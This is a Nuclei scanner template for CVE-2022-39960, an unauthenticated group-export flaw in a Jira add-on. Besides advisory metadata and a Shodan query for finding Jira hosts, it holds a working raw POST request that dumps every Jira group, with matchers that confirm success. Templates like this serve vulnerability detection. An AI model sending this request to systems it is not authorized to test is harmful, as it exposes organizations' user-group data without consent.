nuclei-templates/http/cves/2022/CVE-2022-39960.yaml

57 lines
1.8 KiB
YAML

id: CVE-2022-39960
info:
name: Jira Netic Group Export <1.0.3 - Missing Authorization
author: For3stCo1d
severity: medium
description: |
Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
- https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
- https://nvd.nist.gov/vuln/detail/CVE-2022-39960
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-39960
cwe-id: CWE-862
epss-score: 0.29823
cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
verified: true
framework: jira
vendor: netic
product: group_export
tags: cve,cve2022,atlassian,jira,netic,unauth
http:
- raw:
- |
POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groupexport_searchstring=&groupexport_download=true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jiraGroupObjects"'
- '"groupName"'
condition: and
- type: word
part: header
words:
- "attachment"
- "jira-group-export"
condition: and
- type: status
status:
- 200